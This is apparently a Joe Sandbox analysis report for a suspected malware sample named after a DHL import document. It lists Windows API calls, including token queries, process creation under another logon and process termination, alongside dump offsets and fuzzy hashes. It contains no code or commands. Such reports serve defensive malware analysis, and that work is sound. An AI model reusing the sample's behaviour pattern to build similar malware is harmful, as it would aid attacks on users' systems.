                                                                                          • EnterCriticalSection.KERNEL32(?), ref: 00840863
                                                                                          • LeaveCriticalSection.KERNEL32(?), ref: 008408DC
                                                                                          • ReadFile.KERNEL32(?,?,0000FFFF,00000000,00000000), ref: 008408F3
                                                                                          • InterlockedExchange.KERNEL32(?,000001F6), ref: 00840921
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID: CriticalExchangeFileInterlockedReadSection$EnterLeave
                                                                                          • String ID:
                                                                                          • API String ID: 3368777196-0
                                                                                          • Opcode ID: b25fa7c25879a3cb78c447c4644333ba0fa51f34169cbc4557ac7d7d87c4d44b
                                                                                          • Instruction ID: 937d67721e2bc28f733b7a1893f3c61b8d121a4770724a100b4a41486213b08e
                                                                                          • Opcode Fuzzy Hash: b25fa7c25879a3cb78c447c4644333ba0fa51f34169cbc4557ac7d7d87c4d44b
                                                                                          • Instruction Fuzzy Hash: 88416B71900209EBDF14AF54DC85A6A7B78FF08300F1440A9EE00DA297DB74EE60DFA0
                                                                                          APIs
                                                                                          • ShowWindow.USER32(FFFFFFFF,00000000,?,00000000,00000000,?,0082F3AB,00000000,?,?,00000000,?,0082682C,00000004,00000000,00000000), ref: 0086824C
                                                                                          • EnableWindow.USER32(00000000,00000000), ref: 00868272
                                                                                          • ShowWindow.USER32(FFFFFFFF,00000000), ref: 008682D1
                                                                                          • ShowWindow.USER32(00000000,00000004), ref: 008682E5
                                                                                          • EnableWindow.USER32(00000000,00000001), ref: 0086830B
                                                                                          • SendMessageW.USER32(?,0000130C,00000000,00000000), ref: 0086832F
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID: Window$Show$Enable$MessageSend
                                                                                          • String ID:
                                                                                          • API String ID: 642888154-0
                                                                                          • Opcode ID: 5cc2ff6f1706b3c0cdf6d58c703b6b6e7c3e9ba955614e879acf284e0270c153
                                                                                          • Instruction ID: 15555c4e99de4006c9cb0bb30db23b547d3ddf712d5877362e699447f9fc4127
                                                                                          • Opcode Fuzzy Hash: 5cc2ff6f1706b3c0cdf6d58c703b6b6e7c3e9ba955614e879acf284e0270c153
                                                                                          • Instruction Fuzzy Hash: 71418334601644EFDF21CF25C9A9BA57BE1FB0A714F1A5269E64C8B362CB71A841CB50
                                                                                          APIs
                                                                                          • IsWindowVisible.USER32(?), ref: 00834C95
                                                                                          • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 00834CB2
                                                                                          • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 00834CEA
                                                                                          • _wcslen.LIBCMT ref: 00834D08
                                                                                          • CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 00834D10
                                                                                          • _wcsstr.LIBVCRUNTIME ref: 00834D1A
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID: MessageSend$BuffCharUpperVisibleWindow_wcslen_wcsstr
                                                                                          • String ID:
                                                                                          • API String ID: 72514467-0
                                                                                          • Opcode ID: 86c3543f0851a8c9114c803bb66c743facd56577f6487b140345d5dd438d6ee9
                                                                                          • Instruction ID: 53eeae351c9b8f96ffd22143dcaf7d0818ebebe30baa3cd930492988a3b52d98
                                                                                          • Opcode Fuzzy Hash: 86c3543f0851a8c9114c803bb66c743facd56577f6487b140345d5dd438d6ee9
                                                                                          • Instruction Fuzzy Hash: F1213B31205244BBEB155B35EC09E7B7B9CEF89750F10903DF805CA192EEB5EC0186E0
                                                                                          APIs
                                                                                            • Part of subcall function 007D3AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,007D3A97,?,?,007D2E7F,?,?,?,00000000), ref: 007D3AC2
                                                                                          • _wcslen.LIBCMT ref: 0084587B
                                                                                          • CoInitialize.OLE32(00000000), ref: 00845995
                                                                                          • CoCreateInstance.OLE32(0086FCF8,00000000,00000001,0086FB68,?), ref: 008459AE
                                                                                          • CoUninitialize.OLE32 ref: 008459CC
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID: CreateFullInitializeInstanceNamePathUninitialize_wcslen
                                                                                          • String ID: .lnk
                                                                                          • API String ID: 3172280962-24824748
                                                                                          • Opcode ID: e47b758c03f988a8915f21ce3e3b3668af0839ca72c59c9ff895087f822f19f4
                                                                                          • Instruction ID: 993ee63a0d37814e2b24fa831c320c6a9768a624480fa157b41b43d6bf36c42d
                                                                                          • Opcode Fuzzy Hash: e47b758c03f988a8915f21ce3e3b3668af0839ca72c59c9ff895087f822f19f4
                                                                                          • Instruction Fuzzy Hash: BBD14171608609DFC714DF24C48492EBBE1FF89724F14895AF88A9B362DB31EC05CB92
                                                                                          APIs
                                                                                            • Part of subcall function 00830FB4: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00830FCA
                                                                                            • Part of subcall function 00830FB4: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00830FD6
                                                                                            • Part of subcall function 00830FB4: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00830FE5
                                                                                            • Part of subcall function 00830FB4: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00830FEC
                                                                                            • Part of subcall function 00830FB4: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00831002
                                                                                          • GetLengthSid.ADVAPI32(?,00000000,00831335), ref: 008317AE
                                                                                          • GetProcessHeap.KERNEL32(00000008,00000000), ref: 008317BA
                                                                                          • HeapAlloc.KERNEL32(00000000), ref: 008317C1
                                                                                          • CopySid.ADVAPI32(00000000,00000000,?), ref: 008317DA
                                                                                          • GetProcessHeap.KERNEL32(00000000,00000000,00831335), ref: 008317EE
                                                                                          • HeapFree.KERNEL32(00000000), ref: 008317F5
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
                                                                                          • String ID:
                                                                                          • API String ID: 3008561057-0
                                                                                          • Opcode ID: 3c07dfa1ee25bf882803c02e6b17169f59c8f5888fd5ce6043eb3d3c18b629b5
                                                                                          • Instruction ID: 85244599a7920b2770d4f397b113a604a1522899dbd0444918461bda0efe8b4b
                                                                                          • Opcode Fuzzy Hash: 3c07dfa1ee25bf882803c02e6b17169f59c8f5888fd5ce6043eb3d3c18b629b5
                                                                                          • Instruction Fuzzy Hash: 2711A932600605EFDF209FA4CC49BBE7BA9FB82759F184018F481E7214C776A944CBA0
                                                                                          APIs
                                                                                          • GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 008314FF
                                                                                          • OpenProcessToken.ADVAPI32(00000000), ref: 00831506
                                                                                          • CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 00831515
                                                                                          • CloseHandle.KERNEL32(00000004), ref: 00831520
                                                                                          • CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 0083154F
                                                                                          • DestroyEnvironmentBlock.USERENV(00000000), ref: 00831563
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
                                                                                          • String ID:
                                                                                          • API String ID: 1413079979-0
                                                                                          • Opcode ID: d7bd54e830a5804fec4fd70395d1fe0fbaf78140f23eeb3e12270bc008450929
                                                                                          • Instruction ID: fb42983f28fea5760b6a1e812bbe37ecc69cd57d5a7874a827799b4545147533
                                                                                          • Opcode Fuzzy Hash: d7bd54e830a5804fec4fd70395d1fe0fbaf78140f23eeb3e12270bc008450929
                                                                                          • Instruction Fuzzy Hash: EE11597250020DABDF118F98DD49FEE7BA9FF88B44F054015FA05E2160C3B58E60DBA0
                                                                                          APIs
                                                                                          • GetLastError.KERNEL32(?,?,007F3379,007F2FE5), ref: 007F3390
                                                                                          • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 007F339E
                                                                                          • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 007F33B7
                                                                                          • SetLastError.KERNEL32(00000000,?,007F3379,007F2FE5), ref: 007F3409
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                           • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
                                                                                           • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmp
                                                                                           • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmp
                                                                                           • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmp
                                                                                           • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID: ErrorLastValue___vcrt_
                                                                                          • String ID:
                                                                                          • API String ID: 3852720340-0
                                                                                          • Opcode ID: 9089cb073527b00bf49dec60bd630e275d7ff1b0aac695fa86df641c7e157bdd
                                                                                          • Instruction ID: 2733c64a2ab8ef3faaa7d115941d00fb5f20b4c57a8063af797444aa450afb6e
                                                                                          • Opcode Fuzzy Hash: 9089cb073527b00bf49dec60bd630e275d7ff1b0aac695fa86df641c7e157bdd
                                                                                          • Instruction Fuzzy Hash: 7101DF33609719BEAA2537B8BC89A772A94FB05379B20022AF710C53F0EF5A4E115554
                                                                                          APIs
                                                                                          • GetLastError.KERNEL32(?,?,00805686,00813CD6,?,00000000,?,00805B6A,?,?,?,?,?,007FE6D1,?,00898A48), ref: 00802D78
                                                                                          • _free.LIBCMT ref: 00802DAB
                                                                                          • _free.LIBCMT ref: 00802DD3
                                                                                          • SetLastError.KERNEL32(00000000,?,?,?,?,007FE6D1,?,00898A48,00000010,007D4F4A,?,?,00000000,00813CD6), ref: 00802DE0
                                                                                          • SetLastError.KERNEL32(00000000,?,?,?,?,007FE6D1,?,00898A48,00000010,007D4F4A,?,?,00000000,00813CD6), ref: 00802DEC
                                                                                          • _abort.LIBCMT ref: 00802DF2
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                           • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
                                                                                           • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmp
                                                                                           • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmp
                                                                                           • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmp
                                                                                           • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID: ErrorLast$_free$_abort
                                                                                          • String ID:
                                                                                          • API String ID: 3160817290-0
                                                                                          • Opcode ID: 58b3ef94ae2dca4cded0a0d842168afc8ca89c9da583030bae4ea8ee2e6c98fc
                                                                                          • Instruction ID: 37858004c1a21d95f50b84624bd964be2c58f25a0f9361e9290400223d51790b
                                                                                          • Opcode Fuzzy Hash: 58b3ef94ae2dca4cded0a0d842168afc8ca89c9da583030bae4ea8ee2e6c98fc
                                                                                          • Instruction Fuzzy Hash: 77F0C83664560467D6D2373CBC0EE2A2A5DFFC27A5F354519FD24D22E2EFE58C014162
                                                                                          APIs
                                                                                            • Part of subcall function 007E9639: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 007E9693
                                                                                            • Part of subcall function 007E9639: SelectObject.GDI32(?,00000000), ref: 007E96A2
                                                                                            • Part of subcall function 007E9639: BeginPath.GDI32(?), ref: 007E96B9
                                                                                            • Part of subcall function 007E9639: SelectObject.GDI32(?,00000000), ref: 007E96E2
                                                                                          • MoveToEx.GDI32(?,-00000002,00000000,00000000), ref: 00868A4E
                                                                                          • LineTo.GDI32(?,00000003,00000000), ref: 00868A62
                                                                                          • MoveToEx.GDI32(?,00000000,-00000002,00000000), ref: 00868A70
                                                                                          • LineTo.GDI32(?,00000000,00000003), ref: 00868A80
                                                                                          • EndPath.GDI32(?), ref: 00868A90
                                                                                          • StrokePath.GDI32(?), ref: 00868AA0
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                           • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
                                                                                           • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmp
                                                                                           • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmp
                                                                                           • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmp
                                                                                           • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID: Path$LineMoveObjectSelect$BeginCreateStroke
                                                                                          • String ID:
                                                                                          • API String ID: 43455801-0
                                                                                          • Opcode ID: 1a6fa9fb28381a22d7005ea5e028bb3ba185681c0249759a32624a83a1c798ba
                                                                                          • Instruction ID: 7d9f5a9ed9f8ce568a6349ebf7ee4607c5d54a2b87b16964e5625fcb22ff2b19
                                                                                          • Opcode Fuzzy Hash: 1a6fa9fb28381a22d7005ea5e028bb3ba185681c0249759a32624a83a1c798ba
                                                                                          • Instruction Fuzzy Hash: 87110976000118FFEF129F94EC88EAA7F6CFB08390F058012FA599A1A1C7719D55DBA1
                                                                                          APIs
                                                                                          • GetDC.USER32(00000000), ref: 00835218
                                                                                          • GetDeviceCaps.GDI32(00000000,00000058), ref: 00835229
                                                                                          • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00835230
                                                                                          • ReleaseDC.USER32(00000000,00000000), ref: 00835238
                                                                                          • MulDiv.KERNEL32(000009EC,?,00000000), ref: 0083524F
                                                                                          • MulDiv.KERNEL32(000009EC,00000001,?), ref: 00835261
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                           • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
                                                                                           • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmp
                                                                                           • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmp
                                                                                           • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmp
                                                                                           • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID: CapsDevice$Release
                                                                                          • String ID:
                                                                                          • API String ID: 1035833867-0
                                                                                          • Opcode ID: 4d206b98c540457ab60e913293f0eb017149f6dbb28a22d1be641cbc2de87343
                                                                                          • Instruction ID: 7fd214e856f8454af5f7fbfd85c6d2499b12c863d52878f2e2e75ebf86681435
                                                                                          • Opcode Fuzzy Hash: 4d206b98c540457ab60e913293f0eb017149f6dbb28a22d1be641cbc2de87343
                                                                                          • Instruction Fuzzy Hash: 5A016775E01714BBEB105BA59C49E5EBF78FF44751F045065FA45E7281DAB09C00CFA1
                                                                                          APIs
                                                                                          • MapVirtualKeyW.USER32(0000005B,00000000), ref: 007D1BF4
                                                                                          • MapVirtualKeyW.USER32(00000010,00000000), ref: 007D1BFC
                                                                                          • MapVirtualKeyW.USER32(000000A0,00000000), ref: 007D1C07
                                                                                          • MapVirtualKeyW.USER32(000000A1,00000000), ref: 007D1C12
                                                                                          • MapVirtualKeyW.USER32(00000011,00000000), ref: 007D1C1A
                                                                                          • MapVirtualKeyW.USER32(00000012,00000000), ref: 007D1C22
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                           • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
                                                                                           • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmp
                                                                                           • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmp
                                                                                           • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmp
                                                                                           • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID: Virtual
                                                                                          • String ID:
                                                                                          • API String ID: 4278518827-0
                                                                                          • Opcode ID: f2f5434d90278a4c11252bb8d46cf4685e37e37e90edb7acfad42b2e8c1c8f7f
                                                                                          • Instruction ID: 687ba47921f3d03b5538a56ecf57692ef54e8509ca7cffaf1fbbfa4d7c11a39e
                                                                                          • Opcode Fuzzy Hash: f2f5434d90278a4c11252bb8d46cf4685e37e37e90edb7acfad42b2e8c1c8f7f
                                                                                          • Instruction Fuzzy Hash: 090167B0902B5ABDE3008F6A8C85B52FFA8FF19354F00411BE15C4BA42C7F5A864CBE5
                                                                                          APIs
                                                                                          • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 0083EB30
                                                                                          • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 0083EB46
                                                                                          • GetWindowThreadProcessId.USER32(?,?), ref: 0083EB55
                                                                                          • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 0083EB64
                                                                                          • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 0083EB6E
                                                                                          • CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 0083EB75
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                           • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
                                                                                           • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmp
                                                                                           • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmp
                                                                                           • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmp
                                                                                           • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                                                                                          • String ID:
                                                                                          • API String ID: 839392675-0
                                                                                          • Opcode ID: cc679814a6a0bf1107b1dd6f8cb7e5906394c7dd12174a6988bcbcb5f3a74824
                                                                                          • Instruction ID: 7a565d3d1b98be744fb3caeef5aa1684c47839155607acf7d6caa976e4961c81
                                                                                          • Opcode Fuzzy Hash: cc679814a6a0bf1107b1dd6f8cb7e5906394c7dd12174a6988bcbcb5f3a74824
                                                                                          • Instruction Fuzzy Hash: F1F01772240158BBE6216B62DC0EEBB7A7CFFCAB11F011159F642E119196E05A0186B9
                                                                                          APIs
                                                                                          • GetClientRect.USER32(?), ref: 00827452
                                                                                          • SendMessageW.USER32(?,00001328,00000000,?), ref: 00827469
                                                                                          • GetWindowDC.USER32(?), ref: 00827475
                                                                                          • GetPixel.GDI32(00000000,?,?), ref: 00827484
                                                                                          • ReleaseDC.USER32(?,00000000), ref: 00827496
                                                                                          • GetSysColor.USER32(00000005), ref: 008274B0
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                           • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
                                                                                           • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmp
                                                                                           • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmp
                                                                                           • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmp
                                                                                           • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID: ClientColorMessagePixelRectReleaseSendWindow
                                                                                          • String ID:
                                                                                          • API String ID: 272304278-0
                                                                                          • Opcode ID: 2897eea65885b5f14b39f3a13f314bcc9b57e3da8ee26c2ea8d9c5bcffba9bea
                                                                                          • Instruction ID: 4bf8432fa100c91517f8eaeb60373b00df933e4337fbf0e235d2afd98540852f
                                                                                          • Opcode Fuzzy Hash: 2897eea65885b5f14b39f3a13f314bcc9b57e3da8ee26c2ea8d9c5bcffba9bea
                                                                                          • Instruction Fuzzy Hash: 8A01AD31400215EFEB506FA4EC08BBA7BB5FF14311F126064FA56A21A0CB711E41EB54
                                                                                          APIs
                                                                                          • WaitForSingleObject.KERNEL32(?,000000FF), ref: 0083187F
                                                                                          • UnloadUserProfile.USERENV(?,?), ref: 0083188B
                                                                                          • CloseHandle.KERNEL32(?), ref: 00831894
                                                                                          • CloseHandle.KERNEL32(?), ref: 0083189C
                                                                                          • GetProcessHeap.KERNEL32(00000000,?), ref: 008318A5
                                                                                          • HeapFree.KERNEL32(00000000), ref: 008318AC
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                           • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
                                                                                           • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmp
                                                                                           • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmp
                                                                                           • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmp
                                                                                           • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                                                                          • String ID:
                                                                                          • API String ID: 146765662-0
                                                                                          • Opcode ID: 77fa3bc4b8aec97cba6e7526bab630de11023e402109ab50f0ba13f19ac2428a
                                                                                          • Instruction ID: 45855c8a8b1cd25d42f9f75e000cfc1966f085fd8d47c355138f82c4cfbfbdfc
                                                                                          • Opcode Fuzzy Hash: 77fa3bc4b8aec97cba6e7526bab630de11023e402109ab50f0ba13f19ac2428a
                                                                                          • Instruction Fuzzy Hash: 87E0E536004101BBDB016FA6ED0CD1AFF39FF4AB22B129221F26581170CBB29420DF60
                                                                                          APIs
                                                                                            • Part of subcall function 007D7620: _wcslen.LIBCMT ref: 007D7625
                                                                                          • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 0083C6EE
                                                                                          • _wcslen.LIBCMT ref: 0083C735
                                                                                          • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 0083C79C
                                                                                          • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 0083C7CA
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                           • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
                                                                                           • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmp
